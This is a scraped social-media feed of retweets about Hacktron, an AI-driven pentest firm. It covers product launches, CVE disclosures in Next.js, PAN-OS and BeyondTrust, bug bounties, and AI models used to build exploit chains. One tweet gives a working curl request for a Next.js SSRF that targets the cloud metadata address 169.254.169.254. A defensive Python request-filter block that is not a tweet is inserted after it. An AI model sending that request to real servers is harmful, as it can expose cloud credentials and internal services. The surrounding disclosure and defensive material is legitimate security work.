hehe

Joined June 2019
ungraduate engineer retweeted
Replying to @S1r1u5_
Really hope more people get to try Hacktron. You guys are doing great so far and I love the open source initiative
ungraduate engineer retweeted
So @Doyensec recently published a report comparing @xbow and @AikidoSecurity, two AI pentest platforms. I figured, why not run @HacktronAI on the same test? So I ran a pentest on one of the targets. Hacktron cost $350, while XBOW and Aikido cost $4,000 each. We did pretty well!
ungraduate engineer retweeted
oh interesting! i am not aware of this. we're leading the leaderboard for most critical and weaponizable vulnerabilities, ahead of Anthropic and XBOW haha.
Replying to @corban_villa
Who's finding what? @AnthropicAI owns critical count. @HacktronAI leads on severity exploitability. AISLE covers the most CWE types. There’s no clear overall winner.
ungraduate engineer retweeted
Hacktron Review plugs into your pull requests and catches exploitable vulnerabilities other scanners walk straight past. Find real security issues within 24 hours of onboarding. Try it free → hacktron.ai
ungraduate engineer retweeted
When Your VPN Opens Your Private Network to the Public! An auth bypass in Palo Alto PAN-OS CAS Auth (CVE-2026-0265) that lets an attacker connect to the company's GlobalProtect VPN. Blog - hacktron.ai/blog/cve-2026-02…
ungraduate engineer retweeted
Check out our security work on Next.js. We’re also offering free security scans for open source projects. Apply here: hacktron.ai/blog/hacktron-re…
Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI. CVE-2026-44578: SSRF via WebSocket upgrade. It is the most impactful of all; it lets an attacker read internal hosts such as cloud metadata endpoints on self-hosted Next.js applications.
curl -H "Connection: Upgrade" -H "Upgrade: websocket" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
  "http://target:3000" \
  --request-target "http://169.254.169.254/latest/meta-data/"
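The request shown above combines a WebSocket upgrade with an absolute-form request-target that names the cloud metadata address. As an added, defensive illustration (not code from the posts or from Hacktron), here is a small check a reverse proxy or WAF rule could apply before forwarding an upgrade request: it parses the request head and refuses upgrades whose request-target is an absolute URI pointing at a loopback, link-local or private host. The sample requests and all function names are constructed for this example.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample requests (not captured traffic): a normal WebSocket
# upgrade, and one whose request-target is an absolute URI to the metadata IP.
NORMAL_UPGRADE = (
    "GET /ws HTTP/1.1\r\nHost: app.example\r\nConnection: Upgrade\r\n"
    "Upgrade: websocket\r\nSec-WebSocket-Version: 13\r\n\r\n"
)
METADATA_UPGRADE = (
    "GET http://169.254.169.254/latest/meta-data/ HTTP/1.1\r\nHost: app.example\r\n"
    "Connection: Upgrade\r\nUpgrade: websocket\r\nSec-WebSocket-Version: 13\r\n\r\n"
)

def parse_request(raw):
    """Split an HTTP/1.1 request head into (method, request-target, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("malformed request line")
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def is_upgrade(headers):
    """True when the request asks to switch protocols to WebSocket."""
    conn = {t.strip().lower() for t in headers.get("connection", "").split(",")}
    return "upgrade" in conn and headers.get("upgrade", "").lower() == "websocket"

def target_is_internal(target):
    """True if the request-target is absolute-form and names a non-public host."""
    if not (target.startswith("http://") or target.startswith("https://")):
        return False  # origin-form targets (e.g. "/ws") are handled by normal routing
    host = urlsplit(target).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost"  # assumption: extend with your own internal names
    return ip.is_loopback or ip.is_link_local or ip.is_private

def flag_request(raw):
    """Policy decision for one raw request: 'allow' or a 'block: ...' reason."""
    _method, target, headers = parse_request(raw)
    if is_upgrade(headers) and target_is_internal(target):
        return "block: websocket upgrade with internal absolute request-target " + target
    return "allow"
```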
ungraduate engineer retweeted
This is a critical auth bypass (affecting GlobalProtect VPN), not sure why this was marked as high. I have already managed to get VPN access to major corps! Unlike the buffer overflow this isn't limited to PAN OS. Will be disclosing full details later next week on @HacktronAI blog. security.paloaltonetworks.co…
ungraduate engineer retweeted
Hacktron ❤️ Open Source TL;DR: If you maintain an open source project, we want to give you Hacktron Review for free. Because giving maintainers the same capabilities as attackers would otherwise use against them felt like the right thing to do. hacktron.ai/blog/hacktron-re…
ungraduate engineer retweeted
Next.js v16.2.5 fixes a bunch of vulnerabilities reported by @HacktronAI. Patch ASAP, especially if you're running self-hosted Next.js, as the SSRF might affect you.
CVE-2026-44574: Middleware / Proxy bypass via dynamic route parameter injection
CVE-2026-44578: SSRF in applications using WebSocket upgrades
CVE-2026-44581: XSS in App Router applications using CSP nonces
ungraduate engineer retweeted
How tech bros be seeing their move to sf
ungraduate engineer retweeted
when react2shell hit last year, i think vercel handled it brilliantly. to protect their users, they paid $50,000 for every bypass researchers could find. we decided to participate, and ended up earning $170,000. read how we did it here: hacktron.ai/blog/react2shell…
ungraduate engineer retweeted
"Mohan Pedhapati (@S1r1u5_), CTO of Hacktron, described how he used Opus 4.6 to create a full exploit chain targeting the V8 JavaScript engine in Chrome 138, which is bundled into current versions of Discord." theregister.com/2026/04/17/c…
ungraduate engineer retweeted
Mythos showed that frontier models can find complex vulnerabilities with a skilled operator in the loop. But for applications that don't have the complexity of a JIT compiler, we found that smaller models run repeatedly can outperform larger frontier models on cost-to-recall. hacktron.ai/blog/why-mythos-…
ungraduate engineer retweeted
Introducing Hacktron Review: an AI security reviewer for your pull requests. It understands your whole codebase, builds a threat model, takes your feedback, and catches exploitable vulnerabilities before they reach production. Try for free: app.hacktron.ai
ungraduate engineer retweeted
We won 2nd place at Vercel's AI Accelerator Demo Day and I've been told on very short notice that today is Vercel Day on Product Hunt and to do a launch on it. So here it is. We would love to have your support: producthunt.com/products/hac…
ungraduate engineer retweeted
The exploit for CVE-2026-1731 is out. The APT of CVE-2026-1281 missed a major target 😅. Props to watchTowr for the blog on it. The moment I read it, my instinct said there had to be a variant in remote support, given how heavily it relies on bash scripts. @HacktronAI did the rest. Literally gave me PoC in hand. (Vibe hacking?) What surprised me was that I didn't know this bash quirk earlier, even though I'd already run into a similar quirk in another language. Consider this a reminder: read the blogs. Always.
We just published our @rapid7 analysis of CVE-2026-1731, a critical command injection affecting BeyondTrust Privileged Remote Access (PRA) & Remote Support (RS). Unauthenticated RCE, with a root cause due to Bash arithmetic evaluation. Analysis/PoC here: attackerkb.com/topics/jNMBcc…